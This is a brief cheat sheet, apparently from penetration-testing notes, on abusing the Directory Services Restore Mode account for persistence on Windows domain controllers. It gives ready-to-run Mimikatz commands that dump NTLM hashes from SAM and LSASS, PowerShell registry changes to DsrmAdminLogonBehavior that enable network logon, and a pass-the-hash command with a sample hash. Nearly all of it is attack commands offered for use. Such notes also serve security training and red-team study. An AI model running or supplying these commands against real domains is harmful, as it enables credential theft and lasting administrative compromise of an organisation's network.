Directory Services Restore Mode (DSRM) is a Safe Mode boot option for Windows Server domain controllers and the main purpose of DSRM is to help system admins log in to the system to restore or repair an AD database.
Every Domain controller has local administrator account called "Administrator" and his password is the DSRM password.
Dump DSRM NTLM hash
Require Domain Admin privileges
# dumping from sam - DSRM local Administrator hashInvoke-Mimikatz-Command '"token::elevate" "lsadump::sam"'
# dumping from lsass - Administrator hashInvoke-Mimikatz-Command '"lsadump::lsa /patch"'
Change Logon Behavior
In order to use DSRM account hash we need to change his registry key
# Entering DC sessionEnter-PSSession-ComputerName dcorp-dc# Check if key existsGet-ItemProperty'HKLM:\System\CurrentControlSet\Control\Lsa\'-Name 'DsrmAdminLogonBehavior'# If exists set his value to 2Set-ItemProperty'HKLM:\System\CurrentControlSet\Control\Lsa\'-Name 'DsrmAdminLogonBehavior'-Value 2-Verbose# If does not exist create it and set his value to 2New-ItemProperty'HKLM:\System\CurrentControlSet\Control\Lsa\'-Name 'DsrmAdminLogonBehavior'-Value 2-PropertyType DWORD -Verbose
Passing the hash
# /domain - the domain controllerInvoke-Mimikatz-Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator/ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'# Check if workedls \\dcorp-dc\C$